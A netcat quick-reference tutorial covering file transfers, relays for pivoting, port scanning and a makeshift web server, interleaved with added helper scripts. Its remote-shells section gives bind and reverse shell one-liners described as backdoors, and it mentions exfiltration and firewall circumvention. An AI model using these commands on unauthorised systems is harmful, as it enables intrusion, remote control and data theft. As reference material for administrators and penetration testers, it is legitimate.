Netcat Quick Reference & Examples

This article gives a brief overview of the basics of using the netcat utility. I’ve written it for my own quick reference purposes, but hopefully it will be useful to others.

The syntax below relates to the original ‘Hobbit’ netcat program. Examples will need to be adapted for use with GNU Netcat, socat or Nmap’s ncat.

Basic Operation

Netcat can operate in client or server mode. By default, all network I/O is passed via stdin/stdout.

  • nc [target] [port] - Client operation; connect to target host on port.
  • nc -l -p [port] - Server operation; start a listener on local port.

Commandline Options

The netcat command line usage format is as follows:

$ nc [options] [target] [port(s)]

The target parameter is the remote system’s IP address or hostname: in client mode it is the system to connect to; in server mode it is optional.

-l - Listen (server) mode; the default is client mode.
-L - Listen persistently (keep accepting connections after the first client disconnects); Windows only.
-l -k - Listen persistently; the Linux equivalent of -L.
-p - Local port number to use (the source port in client mode).
-u - Operate in UDP mode (the default is TCP).
-n - Don’t perform DNS lookups.
-wN - Timeout of N seconds, in client or server mode, before exiting.
-v - Print verbose status information to stderr.
-vv - Print extra verbose information to stderr.
-e cmd - Execute cmd and connect its stdin/stdout to the network connection.
-z - Zero-I/O mode; in client mode, connect and then send no payload (used for scanning).

File Transfers with Netcat

It is possible to transfer files between systems using netcat. This is particularly useful in barebones environments where there is no FTP/NFS/CIFS/etc. available. It is also a typical way of exfiltrating data during a penetration test or CTF challenge.

Pull File from Remote Listener

On the remote system a listener should be running with the following command:

nc -l -p [port] < examplefile.bz2

On the local system, download the file with a netcat client using the following command:

nc -w4 [remotehost] [port] > receivedfile.bz2

Push File to Remote Listener

On the remote system a listener should be running with the following command:

nc -l -p [port] > receivedfile.bz2

On the local system, upload the file with a netcat client using the following command:

nc -w4 [remotehost] [port] < examplefile.bz2

TCP Tunnels with Netcat (Linux)

Netcat can be used to forward TCP traffic between two other remote systems. This is generally used to circumvent firewalls and ‘pivot’ during penetration tests.

The process involves creating a FIFO buffer (named pipe) and relaying data between two netcat instances. Create a named pipe with the following command:

mknod backpipe p

Create a netcat relay which forwards packets received on the local port [lport] to a netcat client connected to [target] on [port]:

nc -l -p [lport] 0<backpipe | nc [target] [port] | tee backpipe

For example, to relay Telnet connections received on port 9999 to towel.blinkenlights.nl:

nc -l -p 9999 0<backpipe | nc towel.blinkenlights.nl 23 | tee backpipe

Any locally received connections on port 9999 would now be relayed to the towel host.
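The relay above is easy to get subtly wrong: if backpipe is a regular file rather than a FIFO, the pipeline starts but never relays anything back to the client, and the pipe is left behind when netcat exits. The following wrapper is an added example, not the article’s own commands: it creates the FIFO with mkfifo (equivalent to mknod backpipe p), checks its type before starting netcat, logs what is being relayed, and removes the pipe on exit. The function names and the temporary-directory location are this example’s own choices.

```shell
#!/bin/sh
# Added example (not from the original article): the article's FIFO relay,
# wrapped so the pipe is created correctly, verified, logged and removed on exit.
# Function names and the use of mkfifo (equivalent to "mknod backpipe p")
# are this example's own choices.

# Create a FIFO in a private temporary directory and print its path.
make_backpipe() {
    dir=$(mktemp -d) || return 1
    mkfifo "$dir/backpipe" || return 1
    printf '%s\n' "$dir/backpipe"
}

# Succeed only if PATH is a FIFO. The relay breaks silently if backpipe is a
# regular file, so the type is checked before nc is started.
is_fifo() {
    [ -p "$1" ]
}

# Remove the FIFO and its temporary directory.
remove_backpipe() {
    rm -f "$1" && rmdir "$(dirname "$1")"
}

# Forward connections arriving on local LPORT to TARGET:PORT.
# The pipeline is the article's; the data path is:
#   client -> nc -l (stdout) -> nc target (stdin)
#   nc target (stdout) -> tee -> backpipe -> nc -l (stdin) -> client
run_relay() {
    lport=$1 target=$2 port=$3
    pipe=$(make_backpipe) || return 1
    is_fifo "$pipe" || { echo "not a FIFO: $pipe" >&2; return 1; }
    trap 'remove_backpipe "$pipe"' EXIT INT TERM
    printf '%s relay :%s -> %s:%s (pipe %s)\n' \
        "$(date -u +%FT%TZ)" "$lport" "$target" "$port" "$pipe" >&2
    nc -l -p "$lport" 0<"$pipe" | nc "$target" "$port" | tee "$pipe"
}

# Usage:  sh relay.sh relay 9999 towel.blinkenlights.nl 23
if [ "${1:-}" = relay ]; then
    shift
    run_relay "$@"
fi
```

Like the article’s one-liner, this handles a single client connection and then exits (and now cleans up); wrap run_relay in a loop if the relay should survive the first disconnect.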

TCP Tunnels with Netcat (Windows)

Achieving the same result as illustrated above requires a different command syntax on Windows:

echo nc [target] [port] > relay.bat
nc -l -p [lport] -e relay.bat

Remote Shells with Netcat

Netcat is a popular way to create a remotely accessible shell (or backdoor) on a system.

nc -l -p [port] -e /bin/bash - Creates a Linux Bash shell listening on port.

nc -l -p [port] -e cmd.exe - Creates a Windows command shell listening on port.

Reverse shells can also be created:

nc [remotehost] [port] -e /bin/bash - Connect local Linux Bash Shell to netcat listener on remotehost.

nc [remotehost] [port] -e cmd.exe - Connect local Windows command shell to netcat listener on remotehost.

Port Scanning with Netcat

A simple port scanner can be implemented with the following netcat command line syntax:

nc -v -n -z -w1 -r [target] 1-65535

This attempts a connection to every port in the specified range on target, allowing a timeout of 1 second per port, with the destination port order randomised (-r).

Use -vv on Windows for the same effect. Use -p to specify a local source port for netcat to use.

In a similar approach to the above port scanner, a service banner grabber can be implemented with the following command line syntax:

echo "" | nc -v -n -w1 -r [target] 1-65535
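Both the port scan and the banner grabber report their results as -v status lines, and those lines go to stderr, not stdout, so a scan has to be redirected with 2>&1 before it can be piped anywhere. The following is an added example, not part of the original article: it turns that verbose output into a plain list of open ports. The sample lines are constructed in the format Hobbit netcat prints with -v -n -z (an unresolved host shows as "(UNKNOWN)", an unknown service as "(?)"), and the function names are this example’s own.

```shell
#!/bin/sh
# Added example (not from the original article): turn netcat's verbose scan
# output into a port list. SAMPLE_SCAN is constructed in the format Hobbit
# netcat prints with -v -n -z; function names are this example's own.
# -v status lines go to stderr, hence the 2>&1 in scan_open_ports below.

# Constructed sample of "nc -v -n -z -w1 -r 10.0.0.5 1-65535 2>&1" output.
SAMPLE_SCAN='(UNKNOWN) [10.0.0.5] 443 (https) open
(UNKNOWN) [10.0.0.5] 23 (telnet) : Connection refused
(UNKNOWN) [10.0.0.5] 22 (ssh) open
(UNKNOWN) [10.0.0.5] 8080 (?) open
(UNKNOWN) [10.0.0.5] 25 (smtp) : Connection refused'

# Read scan output on stdin; print open port numbers, one per line, ascending.
# Every "open" line ends "... PORT (SERVICE) open", so the port is the
# third-from-last field whether or not the host name was resolved.
parse_open_ports() {
    awk '$NF == "open" { print $(NF - 2) }' | sort -n
}

# The same list as a single comma-separated line, for feeding to other tools.
open_ports_csv() {
    parse_open_ports | paste -s -d, -
}

# Number of open ports in the scan output on stdin.
count_open_ports() {
    parse_open_ports | wc -l | tr -d ' '
}

# Run the article's scan against TARGET and print the open ports found.
# Not executed here; requires netcat on the path.
scan_open_ports() {
    nc -v -n -z -w1 -r "$1" 1-65535 2>&1 | open_ports_csv
}

# Offline demonstration on the constructed sample:
#   printf '%s\n' "$SAMPLE_SCAN" | open_ports_csv    ->  22,443,8080
```

The same redirection applies to the banner grabber: its status lines arrive on stderr while any banner text the service sends arrives on stdout, so keep the two streams separate (or merge them deliberately with 2>&1) depending on which you want to capture.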

Makeshift Webserver with Netcat

Notably useful in emergency maintenance scenarios, netcat can be jury-rigged to act as a simple web server:

while true; do nc -l -p 80 -q 1 < maintenance.html; done
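The loop above sends the raw HTML with no status line or headers, which most browsers tolerate but which gives clients and monitoring no way to tell a maintenance page from a live 200 response. The following is an added example, not the article’s own commands: it builds a complete HTTP/1.0 response around the file (a 503 with Retry-After by default, so crawlers and health checks treat the outage as temporary) and serves it with the same netcat loop. The status code choice and the function names are this example’s own.

```shell
#!/bin/sh
# Added example (not from the original article): serve the maintenance page
# with a proper HTTP response rather than bare HTML. The 503 status, the
# Retry-After value and the function names are this example's own choices.

# Byte length of FILE, with the padding some wc builds print removed.
content_length() {
    wc -c < "$1" | tr -d ' '
}

# Write a complete HTTP/1.0 response for FILE to stdout.
# STATUS defaults to "503 Service Unavailable"; pass "200 OK" to serve normally.
http_response() {
    file=$1
    status=${2:-503 Service Unavailable}
    printf 'HTTP/1.0 %s\r\n' "$status"
    printf 'Content-Type: text/html; charset=utf-8\r\n'
    printf 'Content-Length: %s\r\n' "$(content_length "$file")"
    printf 'Retry-After: 300\r\n'
    printf 'Connection: close\r\n'
    printf '\r\n'
    cat "$file"
}

# First line of the response, as a client will see it.
status_line() {
    http_response "$1" "${2:-}" | head -n 1 | tr -d '\r'
}

# Serve FILE on PORT until interrupted. Same loop as the article; the request
# bytes nc reads from the client are discarded instead of echoed to the terminal.
serve_maintenance() {
    port=$1 file=$2
    while true; do
        http_response "$file" | nc -l -p "$port" -q 1 >/dev/null
    done
}

# Usage:  sh maint.sh serve 80 maintenance.html   (binding port 80 needs root)
if [ "${1:-}" = serve ]; then
    serve_maintenance "$2" "$3"
fi
```

Note that -q (close after stdin EOF plus a delay) is a GNU/Debian netcat option, as in the article’s loop; on the original Hobbit netcat use -w instead.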

Remote Partition Cloning with Netcat

As an extension to the above file transfer examples, it’s possible to remotely duplicate an offline partition using netcat. On the system containing the partition to be duplicated, run the following command to start a netcat client:

dd if=/dev/sdc | nc [target] [port]

On the receiving system, create a netcat listener on [port] to receive the partition image:

nc -l -p [port] | dd of=/tmp/sdc.img

The received dd image file can then be mounted or written to a physical disk.
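Netcat gives no indication that a transfer arrived complete and intact: a dropped connection or an early -w timeout simply produces a shorter file. The following is an added example, not the article’s own commands, covering both the file transfers above and this partition cloning: each side prints a SHA-256 digest so the two can be compared, and the dd stream is compressed on the wire. The function names, the gzip step and the sha256sum/shasum fallback are this example’s choices.

```shell
#!/bin/sh
# Added example (not from the original article): the article's file-transfer
# and partition-cloning commands, wrapped with a SHA-256 digest on each side so
# the result can be verified. Function names, the gzip compression of the dd
# stream and the sha256sum/shasum fallback are this example's own choices.

# Print the SHA-256 hex digest of a file or block device.
digest() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{ print $1 }'
    else
        shasum -a 256 "$1" | awk '{ print $1 }'
    fi
}

# Succeed if two paths (files or devices) have identical contents.
same_content() {
    [ "$(digest "$1")" = "$(digest "$2")" ]
}

# --- file transfer (the article's "push" direction) -----------------------
# Sender: print the digest for the receiver to compare against, then send.
push_file() { # FILE HOST PORT
    printf 'sha256 %s  %s\n' "$(digest "$1")" "$1" >&2
    nc -w4 "$2" "$3" < "$1"
}

# Receiver: listen as the article does, then print the digest of what arrived.
recv_file() { # PORT OUTFILE
    nc -l -p "$1" > "$2"
    printf 'sha256 %s  %s\n' "$(digest "$2")" "$2" >&2
}

# --- partition cloning ----------------------------------------------------
# Sender: the device must be unmounted (offline) so the digest matches what
# dd reads. The stream is gzip-compressed on the wire; the digest is of the
# raw device.
send_image() { # DEVICE HOST PORT
    printf 'sha256 %s  %s\n' "$(digest "$1")" "$1" >&2
    dd if="$1" | gzip -c | nc -w4 "$2" "$3"
}

# Receiver: decompress into the image file, then print its digest. Matching
# digests confirm the image is byte-for-byte identical to the source device.
recv_image() { # PORT OUTFILE
    nc -l -p "$1" | gunzip -c | dd of="$2"
    printf 'sha256 %s  %s\n' "$(digest "$2")" "$2" >&2
}
```

Start the receiving function first, then the sending one, and compare the two printed digests; a mismatch means the image should be discarded and the copy repeated rather than mounted.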
